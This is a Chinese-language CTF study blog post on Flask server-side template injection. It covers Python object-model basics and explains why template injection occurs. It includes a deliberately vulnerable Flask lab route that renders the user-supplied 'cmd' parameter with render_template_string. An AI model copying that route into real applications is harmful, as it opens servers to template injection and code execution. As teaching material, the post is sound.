<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="HandheldFriendly" content="True" />
    <meta
        name="viewport"
        content="width=device-width, initial-scale=1, maximum-scale=5"
    />
    <meta name="description" content="去年11.4号就有学过，一年没学又给忘记了  Python前置知识.使用 属性访问：使用点号可以访问对象的属性和方法。 例如，object.property 可以获取对象的属性值， object.method() 可以调用对象的方法。   模块导入：使用点号可以导入模块中的子模块、变量、函数或类 例如，import module.submodule 可以导入模块的子模块， from module">
<meta property="og:type" content="article">
<meta property="og:title" content="flask_ssti">
<meta property="og:url" content="https://kc1zs4.github.io/2024/11/11/flask_ssti/index.html">
<meta property="og:site_name" content="KC1zs4&#39;s Blog">
<meta property="og:description" content="去年11.4号就有学过，一年没学又给忘记了  Python前置知识.使用 属性访问：使用点号可以访问对象的属性和方法。 例如，object.property 可以获取对象的属性值， object.method() 可以调用对象的方法。   模块导入：使用点号可以导入模块中的子模块、变量、函数或类 例如，import module.submodule 可以导入模块的子模块， from module">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://kc1zs4.github.io/pic/Flask_ssti/flask_ssti_flow.png">
<meta property="og:image" content="https://kc1zs4.github.io/pic/Flask_ssti/ssti_%E5%A4%A7%E5%85%A8.png">
<meta property="og:image" content="https://kc1zs4.github.io/pic/Flask_ssti/ssti_%E5%88%A4%E6%96%AD.png">
<meta property="og:image" content="https://kc1zs4.github.io/pic/Flask_ssti/executeClass.png">
<meta property="article:published_time" content="2024-11-11T03:36:12.825Z">
<meta property="article:modified_time" content="2025-02-11T12:47:55.703Z">
<meta property="article:tag" content="Python安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://kc1zs4.github.io/pic/Flask_ssti/flask_ssti_flow.png">    
    <link
        rel="shortcut icon"
        href="/images/favicon.ico"
    />
       
    <link
        rel="icon"
        type="image/png"
        href="/images/favicon-192x192.png"
        sizes="192x192"
    />
       
    <link
        rel="apple-touch-icon"
        sizes="180x180"
        href="/images/apple-touch-icon.png"
    />
      
    <!-- title -->
    <title>flask_ssti</title>
    <!-- async scripts -->
    <!-- Google Analytics -->

  <script async src="https://www.googletagmanager.com/gtag/js?id=G-Z6JGRC9FT2"></script>
  <script>
      window.dataLayer = window.dataLayer || [];
      function gtag(){dataLayer.push(arguments);}
      gtag('js', new Date());
      gtag('config', 'G-Z6JGRC9FT2');
  </script>

 <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
     
    <!-- mathjax -->
    
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/tags/">Tag</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2024/11/11/Python%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2024/11/10/pcb24/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://kc1zs4.github.io/2024/11/11/flask_ssti/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://kc1zs4.github.io/2024/11/11/flask_ssti/&text=flask_ssti"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://kc1zs4.github.io/2024/11/11/flask_ssti/&title=flask_ssti"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://kc1zs4.github.io/2024/11/11/flask_ssti/&is_video=false&description=flask_ssti"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=flask_ssti&body=Check out this article: https://kc1zs4.github.io/2024/11/11/flask_ssti/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://kc1zs4.github.io/2024/11/11/flask_ssti/&title=flask_ssti"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://kc1zs4.github.io/2024/11/11/flask_ssti/&title=flask_ssti"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://kc1zs4.github.io/2024/11/11/flask_ssti/&title=flask_ssti"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://kc1zs4.github.io/2024/11/11/flask_ssti/&title=flask_ssti"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://kc1zs4.github.io/2024/11/11/flask_ssti/&name=flask_ssti&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://kc1zs4.github.io/2024/11/11/flask_ssti/&t=flask_ssti"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Python%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86"><span class="toc-number">1.</span> <span class="toc-text">Python前置知识</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8"><span class="toc-number">1.1.</span> <span class="toc-text">.使用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%B9%E5%99%A8"><span class="toc-number">1.2.</span> <span class="toc-text">容器</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%A8%A1%E5%9D%97%E5%92%8C%E5%8C%85"><span class="toc-number">1.3.</span> <span class="toc-text">模块和包</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%89%B9%E6%AE%8A%E5%8F%98%E9%87%8F%E5%92%8C%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95"><span class="toc-number">1.4.</span> <span class="toc-text">*特殊变量和魔术方法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%85%83%E7%B1%BB"><span class="toc-number">1.5.</span> <span class="toc-text">元类</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%98%8E%E7%A1%AE%E7%9B%AE%E6%A0%87"><span class="toc-number">1.5.1.</span> <span class="toc-text">明确目标</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BB%80%E4%B9%88%E6%98%AF%E5%85%83%E7%B1%BB"><span class="toc-number">1.5.2.</span> <span class="toc-text">什么是元类</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#type%E4%B8%8Eobject"><span class="toc-number">1.5.3.</span> <span class="toc-text">type与object</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Python%E8%AE%BF%E9%97%AE%E6%8E%A7%E5%88%B6"><span class="toc-number">1.6.</span> <span class="toc-text">Python访问控制</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%80%E4%B9%88%E6%98%AF%E6%A8%A1%E6%9D%BF%EF%BC%9F"><span class="toc-number">2.</span> <span class="toc-text">什么是模板？</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%A8%A1%E6%9D%BF%E5%B7%A5%E4%BD%9C%E6%B5%81"><span class="toc-number">2.1.</span> <span class="toc-text">*模板工作流</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E6%A8%A1%E6%9D%BF%E5%BC%95%E6%93%8E%E5%8F%8A%E5%85%B6%E5%8F%98%E9%87%8F%E8%AF%AD%E6%B3%95"><span class="toc-number">2.2.</span> <span class="toc-text">常见模板引擎及其变量语法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%B1%BB%E5%9E%8B%E5%88%A4%E6%96%AD%E5%9B%BE%E4%BE%8B"><span class="toc-number">2.3.</span> <span class="toc-text">类型判断图例</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Flask-ssti"><span class="toc-number">3.</span> <span class="toc-text">Flask ssti</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="toc-number">3.1.</span> <span class="toc-text">环境搭建</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Jinja2%E5%9F%BA%E7%A1%80"><span class="toc-number">3.2.</span> <span class="toc-text">Jinja2基础</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ssti%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">3.3.</span> <span class="toc-text">ssti漏洞利用</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%B1%BB%E5%9E%8B%E4%B8%80-%E5%9F%BA%E7%B1%BB%E6%89%BE%E6%A8%A1%E5%9D%97"><span class="toc-number">3.3.1.</span> <span class="toc-text">类型一: 基类找模块</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E5%9F%BA%E7%B1%BB"><span class="toc-number">3.3.1.1.</span> <span class="toc-text">获取基类</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%AF%BB%E6%89%BE%E5%AD%90%E7%B1%BB"><span class="toc-number">3.3.1.2.</span> <span class="toc-text">寻找子类</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C"><span class="toc-number">3.3.1.3.</span> <span class="toc-text">*命令执行</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E8%87%AA%E5%8A%A8%E5%8C%96%E6%9F%A5%E6%89%BE"><span class="toc-number">3.3.1.4.</span> <span class="toc-text">自动化查找</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%B1%BB%E5%9E%8B%E4%BA%8C-%E7%9B%B4%E6%8E%A5%E6%89%BE%E6%A8%A1%E5%9D%97"><span class="toc-number">3.3.2.</span> <span class="toc-text">类型二: 直接找模块</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ssti%E7%BB%95%E8%BF%87"><span class="toc-number">3.4.</span> <span class="toc-text">ssti绕过</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Ref"><span class="toc-number">4.</span> <span class="toc-text">Ref</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        flask_ssti
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name"></span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-11-11T03:36:12.825Z" class="dt-published" itemprop="datePublished">2024-11-11</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/CTF/">CTF</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/Python%E5%AE%89%E5%85%A8/" rel="tag">Python安全</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <blockquote>
<p>去年11.4号就有学过，一年没学又给忘记了</p>
</blockquote>
<h2 id="Python前置知识"><a href="#Python前置知识" class="headerlink" title="Python前置知识"></a>Python前置知识</h2><h3 id="使用"><a href="#使用" class="headerlink" title=".使用"></a><code>.</code>使用</h3><ol>
<li>属性访问：使用点号可以访问对象的属性和方法。<ol>
<li>例如，object.property 可以获取对象的属性值，</li>
<li>object.method() 可以调用对象的方法。</li>
</ol>
</li>
<li>模块导入：使用点号可以导入模块中的子模块、变量、函数或类<ol>
<li>例如，import module.submodule 可以导入模块的子模块，</li>
<li>from module import function 可以导入模块中的函数。</li>
</ol>
</li>
<li>类成员访问：在类定义中，使用点号可以访问类的静态变量、类方法或类属性。<ol>
<li>例如，ClassName.static_variable 可以访问类的静态变量，</li>
<li>ClassName.class_method() 可以调用类的方法。</li>
</ol>
</li>
<li>字典键访问：在字典中，使用点号可以通过键来访问相应的值<ol>
<li>例如 dictionary.key 可以获取字典中键对应的值</li>
<li>但是元组不可以</li>
</ol>
</li>
</ol>
<h3 id="容器"><a href="#容器" class="headerlink" title="容器"></a>容器</h3><ol>
<li><p>tuple元组: 不可变(值不可以杯修改、添加和删除)，类似数组</p>
<ol>
<li><strong>对于可变对象</strong>: 如果元组中包含可变对象（如列表），则可以在可变对象中修改其值</li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">tuple5 = ([<span class="number">1</span>, <span class="number">2</span>, <span class="number">3</span>], <span class="string">&#x27;apple&#x27;</span>)</span><br><span class="line">tuple5[<span class="number">0</span>][<span class="number">0</span>] = <span class="number">5</span>  <span class="comment">#用[]可以多次选定</span></span><br><span class="line"><span class="built_in">print</span>(tuple5)    <span class="comment"># 输出：([5, 2, 3], &#x27;apple&#x27;)</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>list列表: 可改变的tuple，也使用索引访问元素</p>
<ol>
<li><code>list.remove(...)</code>和<code>list.append(...)</code>，支持切片操作</li>
</ol>
</li>
<li><p>dict字典: 每个键值对之间使用冒号 : 分隔，键和值之间使用逗号 , 分隔。<strong>键必须是不可变的类型</strong>（如字符串（<strong>python中的字符串是不可变的</strong>、整数、浮点数或元组），而值可以是任意类型，使用<code>[]</code>或者<code>.</code>来访问元素</p>
</li>
</ol>
<h3 id="模块和包"><a href="#模块和包" class="headerlink" title="模块和包"></a>模块和包</h3><ol>
<li>python文件就是一个python模块，也可以是内置的模块，可以<strong>从中导入函数和变量</strong></li>
<li>通过目录结构+<code>__init__.py</code>(3.3之后不需要)可以创建包来提供命名空间并进行组织</li>
<li>类似于cpp中的库文件</li>
</ol>
<h3 id="特殊变量和魔术方法"><a href="#特殊变量和魔术方法" class="headerlink" title="*特殊变量和魔术方法"></a>*特殊变量和魔术方法</h3><h3 id="元类"><a href="#元类" class="headerlink" title="元类"></a>元类</h3><h4 id="明确目标"><a href="#明确目标" class="headerlink" title="明确目标"></a>明确目标</h4><blockquote>
<p>可以先见《Python原型链污染》这篇博客<br>这一章就为了理解这一句话: <em><strong>在 Python 中，object 是所有类的基类，而 type 是所有类的元类</strong></em></p>
</blockquote>
<h4 id="什么是元类"><a href="#什么是元类" class="headerlink" title="什么是元类"></a>什么是元类</h4><ol>
<li><p>元类（Metaclass）是类的类。它负责创建类对象。</p>
<ol>
<li>在 Python 中，类本身也是对象，这些对象是由元类创建的。</li>
<li><strong>默认情况下，所有类都是由 type 元类创建的</strong></li>
<li>作用：元类（Metaclass）是类的类。它负责创建类对象。在 Python 中，类本身也是对象，这些对象是由元类创建的。</li>
</ol>
</li>
<li><p>自定义元类：元类通常通过继承 type 类来定义，并重写其 <code>__new__</code>或 <code>__init__</code> 方法。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">MyMeta</span>(<span class="title class_ inherited__">type</span>):</span><br><span class="line">   </span><br><span class="line">   <span class="comment"># new在创建类的时候调用(定义后运行py文件后)，而不是在创建实例的时候调用</span></span><br><span class="line">   <span class="keyword">def</span> <span class="title function_">__new__</span>(<span class="params">cls, name, bases, dct</span>):</span><br><span class="line">       <span class="built_in">print</span>(<span class="string">f&quot;Creating class <span class="subst">&#123;name&#125;</span> with metaclass <span class="subst">&#123;cls&#125;</span>&quot;</span>)</span><br><span class="line">       <span class="comment"># dct是类的属性字典，添加到类的属性中(static)</span></span><br><span class="line">       dct[<span class="string">&#x27;custom_attribute&#x27;</span>] = <span class="string">&quot;This is a custom attribute&quot;</span></span><br><span class="line">       <span class="keyword">return</span> <span class="built_in">super</span>().__new__(cls, name, bases, dct)</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">MyClass</span>(metaclass=MyMeta):</span><br><span class="line">   <span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line">obj = MyClass()</span><br><span class="line"><span class="built_in">print</span>(obj.custom_attribute)</span><br><span class="line"><span class="comment"># 输出: This is a custom attribute</span></span><br></pre></td></tr></table></figure></li>
</ol>
<h4 id="type与object"><a href="#type与object" class="headerlink" title="type与object"></a>type与object</h4><ol>
<li><p>object 类</p>
<ol>
<li>用途：object 是所有类的基类。每个类（无论是用户定义的类还是内置类）都隐式或显式地继承自 object。</li>
<li>特点：<ol>
<li>所有对象都是 object 的实例</li>
<li>object 提供了一些基本的方法，如 <code>__str__</code>、<code>__repr__</code></li>
</ol>
</li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">MyClass</span>():</span><br><span class="line">    <span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># MyClass 继承自 object</span></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">issubclass</span>(MyClass, <span class="built_in">object</span>))  <span class="comment"># 输出: True</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># MyClass 的实例也是 object 的实例</span></span><br><span class="line">obj = MyClass()</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">isinstance</span>(obj, <span class="built_in">object</span>))  <span class="comment"># 输出: True</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>type 元类</p>
<ol>
<li>用途：type 是所有类的元类。元类是类的类，负责创建类。</li>
<li>特点：<ol>
<li>所有类都是 type 的实例。</li>
<li><strong>type 本身也是一个类，同时也是一个元类</strong></li>
</ol>
</li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">MyClass</span>:</span><br><span class="line">    <span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># MyClass 是 type 的实例</span></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">isinstance</span>(MyClass, <span class="built_in">type</span>))  <span class="comment"># 输出: True</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># type 本身也是一个类</span></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">type</span>(<span class="built_in">type</span>))  <span class="comment"># 输出: &lt;class &#x27;type&#x27;&gt;</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>二者的关系: 循环引用</p>
<ol>
<li>object 是 type 的实例：<ol>
<li>object 本身是一个类，它是 type 的实例。</li>
</ol>
</li>
<li>type 是 object 的子类：<ol>
<li>type 继承自 object，因此 type 也是 object 的实例</li>
</ol>
</li>
<li><strong>实现方面</strong><ol>
<li>type 先于 object 存在：</li>
<li>在 Python 的启动过程中，首先创建 type 类。</li>
<li>然后使用 type 类来创建 object 类。</li>
</ol>
</li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">                      <span class="comment"># 直接父类</span></span><br><span class="line">+-------------------+ ----------&gt; +-------------------+</span><br><span class="line">|      <span class="built_in">object</span>       |             |       <span class="built_in">type</span>        |</span><br><span class="line">+-------------------+ &lt;---------- +-------------------+</span><br><span class="line">          |            <span class="comment"># 创建类实例</span></span><br><span class="line">          v</span><br><span class="line">+-------------------+</span><br><span class="line">|     MyClass       |</span><br><span class="line">+-------------------+</span><br><span class="line">          |</span><br><span class="line">          v</span><br><span class="line">+-------------------+</span><br><span class="line">|       obj         |</span><br><span class="line">+-------------------+</span><br></pre></td></tr></table></figure></li>
</ol>
<h3 id="Python访问控制"><a href="#Python访问控制" class="headerlink" title="Python访问控制"></a>Python访问控制</h3><ol>
<li>Python 通过命名约定来实现访问控制，而不是像其他语言（如 Java 或 C++）那样通过严格的关键字（如 private 或 protected）来实现<ol>
<li>公有（Public）:成员名称没有任何前缀，可以在类的外部直接访问，比如<code>self.public_attribute</code></li>
<li>保护（Protected）:成员名称以单下划线 _ 开头，这是一种约定，表示该成员仅供类内部或子类使用，外部不应直接访问；比如<code>self._protected_attribute</code></li>
<li>私有（Private）:成员名称以双下划线 __ 开头，Python 会对名称进行名称修饰（name mangling），使其在类外部难以直接访问；示比如<code>self.__private_attribute</code></li>
</ol>
</li>
<li><strong>并不安全</strong>: Python 的访问控制并非绝对安全，私有成员仍然可以通过名称修饰访问，保护成员和私有成员<strong>更多是一种约定</strong>，依赖于开发者的自觉</li>
</ol>
<h2 id="什么是模板？"><a href="#什么是模板？" class="headerlink" title="什么是模板？"></a>什么是模板？</h2><h3 id="模板工作流"><a href="#模板工作流" class="headerlink" title="*模板工作流"></a>*模板工作流</h3><ol>
<li><p><em><strong>模板引擎</strong></em>:(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据（内容）分离而产生的，它可以生成特定格式的文档，<strong>利用模板引擎来生成前端的html代码</strong>，模板引擎会提供一套生成html代码的程序，然后只需要获取用户的数据，然后放到渲染函数里，然后生成模板+用户数据的前端html页面，然后反馈给浏览器，呈现在用户面前。  </p>
<ol>
<li>模板引擎也会提供沙箱机制来进行漏洞防范，但是可以用<strong>沙箱逃逸技术</strong>来进行绕过。</li>
</ol>
</li>
<li><p><em><strong>漏洞成因</strong></em>:服务端接收了用户的恶意输入以后，未经任何处理就将其作为 Web 应用模板内容的一部分，模板引擎在进行目标编译渲染的过程中，执行了用户插入的可以破坏模板的语句，因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性 –&gt; <strong>在模板渲染的时候进行了解析操作，支持代码的执行</strong></p>
<ol>
<li><img src="/pic/Flask_ssti/flask_ssti_flow.png" alt="Flow"></li>
<li>如果使用固定了的模板，渲染后传入数据，就不存在模板注入了，比如一下的flask jinja2就不会模板注入</li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 预防模板注入</span></span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, request</span><br><span class="line"><span class="keyword">from</span> jinja2 <span class="keyword">import</span> Template</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&quot;/&quot;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line">   name = request.args.get(<span class="string">&#x27;name&#x27;</span>, <span class="string">&#x27;guest&#x27;</span>)</span><br><span class="line"></span><br><span class="line">   t = Template(<span class="string">&quot;Hello &#123;&#123;n&#125;&#125;&quot;</span>)</span><br><span class="line">   <span class="keyword">return</span> t.render(n=name)</span><br><span class="line">   <span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">   此处会将name整个值保留下来而不是直接当作&#123;&#123;&#125;&#125;</span></span><br><span class="line"><span class="string">   所以避免了直接执行的问题，其实就是把&#123;&#123;&#125;&#125;先给你写好了</span></span><br><span class="line"><span class="string">   &quot;&quot;&quot;</span></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">app.run()</span><br></pre></td></tr></table></figure></li>
</ol>
<h3 id="常见模板引擎及其变量语法"><a href="#常见模板引擎及其变量语法" class="headerlink" title="常见模板引擎及其变量语法"></a>常见模板引擎及其变量语法</h3><p><img src="/pic/Flask_ssti/ssti_%E5%A4%A7%E5%85%A8.png" alt="ssti大全"></p>
<h3 id="类型判断图例"><a href="#类型判断图例" class="headerlink" title="类型判断图例"></a>类型判断图例</h3><p><img src="/pic/Flask_ssti/ssti_%E5%88%A4%E6%96%AD.png" alt="ssti_conclude"></p>
<h2 id="Flask-ssti"><a href="#Flask-ssti" class="headerlink" title="Flask ssti"></a>Flask ssti</h2><h3 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h3><ol>
<li><p>S1: <code>conda install Flask</code></p>
</li>
<li><p>S2: 启动路由脚本</p>
<ol>
<li>自己添加题目脚本即可</li>
<li><strong>注意使用debug模式，修改实时可以查看</strong></li>
<li><strong>就算搭建起来的话在本地的链可能也会服务器上的不一样，留个心眼，可以在题目中测还是在题目中测好</strong></li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, render_template_string, request</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&quot;/ssti&quot;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">ssti</span>():</span><br><span class="line">    cmd = request.args.get(<span class="string">&quot;cmd&quot;</span>)</span><br><span class="line">    <span class="keyword">if</span> cmd:</span><br><span class="line">       <span class="keyword">return</span> render_template_string(cmd)</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&quot;input to ssti&quot;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    <span class="comment"># app.run(port=5000, debug=True)</span></span><br><span class="line">    app.run(port=<span class="number">5000</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure></li>
</ol>
<h3 id="Jinja2基础"><a href="#Jinja2基础" class="headerlink" title="Jinja2基础"></a>Jinja2基础</h3><blockquote>
<p>Flask是一个使用Python编写的轻量级web应用框架，其WSGI工具箱采用Werkzeug，模板引擎默认使用Jinja2</p>
</blockquote>
